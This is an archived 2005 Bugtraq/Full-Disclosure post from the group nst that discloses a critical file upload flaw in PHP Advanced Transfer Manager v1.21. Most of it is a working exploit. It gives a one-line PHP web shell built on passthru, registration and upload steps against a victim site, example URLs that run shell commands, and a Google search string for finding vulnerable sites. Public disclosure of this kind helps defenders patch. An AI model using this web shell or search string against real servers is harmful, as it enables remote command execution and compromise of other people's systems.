lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <1214871813.20050506114315@gmail.com>
Date: Fri, 6 May 2005 11:43:15 +0300
From: tjomi4@...il.com
To: bugtraq@...urityfocus.com, full-disclosure@...ts.netsys.com,
	support@...uritylab.ru, <vuln@...urity.nnov.ru>, <tjomi4@...il.com>
Subject: PHP Advanced Transfer Manager v1.21


oooo...oooo.oooooooo8.ooooooooooo
.8888o..88.888........88..888..88 
.88.888o88..888oooooo.....888     
.88...8888.........888....888     
o88o....88.o88oooo888....o888o    
********************************
**** Network security team *****
********* nst.void.ru **********
********************************
* Title: PHP Advanced Transfer Manager v1.21
* Bug found by: nst
* Date: 06.05.2005
********************************

Owner: phpatm.free.fr
Google: allintitle:PHP Advanced Transfer Manager

Status: Critical

*** File upload.

1. Register :: http://victim/register.php
2. Login :: http://victim/login.php


Create file:
nst.php.ns

<pre>
<?
passthru($_GET['nst']);
?>

Then upload, and go to http://victim/files/nst.php.ns?nst=ls -la

or

<?
passthru($_GET['nst']);
?>

Then upload, and go to http://victim/files/nst.php.ns?nst=http://your/file.txt

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ